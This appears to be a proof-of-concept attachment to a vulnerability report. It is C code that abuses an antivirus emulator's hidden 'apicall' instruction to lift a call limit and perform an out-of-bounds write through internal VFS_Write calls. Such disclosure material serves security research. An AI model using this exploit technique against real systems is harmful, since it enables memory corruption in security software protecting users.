New issue
Advanced search Search tips

Issue 1282 attachment: testcase.c (1.6 KB)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#include <windows.h>
#include <stdint.h>
#include <stdlib.h>
#include <limits.h>

#pragma pack(1)
#pragma comment(linker, "/SECTION:.text,ERW")

uint32_t crcstr(unsigned char *message) {
int i, j;
unsigned int byte, crc, mask;

i = 0;
crc = 0xFFFFFFFF;
while (message[i] != 0) {
byte = message[i]; // Get next byte.
crc = crc ^ byte;
for (j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
i = i + 1;
}
return crc;
}

DWORD MpApiCall(PCHAR Module, PCHAR ProcName, ...)
{
DWORD Result;
DWORD ApiCrc;

ApiCrc = crcstr(Module) ^ crcstr(ProcName);

_asm {
mov eax, dword ptr ApiCrc
mov [apicode], eax
mov ebx, esp
lea esp, ProcName
_emit 0x0f
_emit 0xff
_emit 0xf0
apicode:
_emit 0x00
_emit 0x00
_emit 0x00
_emit 0x00
mov esp, ebx
mov Result, eax
}

return Result;
}

int main(int argc, char **argv)
{
BYTE Buf[8192];
HANDLE Handle;

MpApiCall("NTDLL.DLL", "NtControlChannel", 0xA); // Disable apicall limit

ZeroMemory(Buf, sizeof Buf);

Handle = (HANDLE) MpApiCall("NTDLL.DLL", "VFS_Open", L"filename", TRUE);

// Extend the size, but don't write any data.
MpApiCall("NTDLL.DLL", "VFS_Write", Handle, Buf, 0, 0xffffffff, 0);

// Now we can write to an artbirary offset.
MpApiCall("NTDLL.DLL", "VFS_Write", Handle, Buf, 0x7ff, 0x41414141, 0);

return 0;
}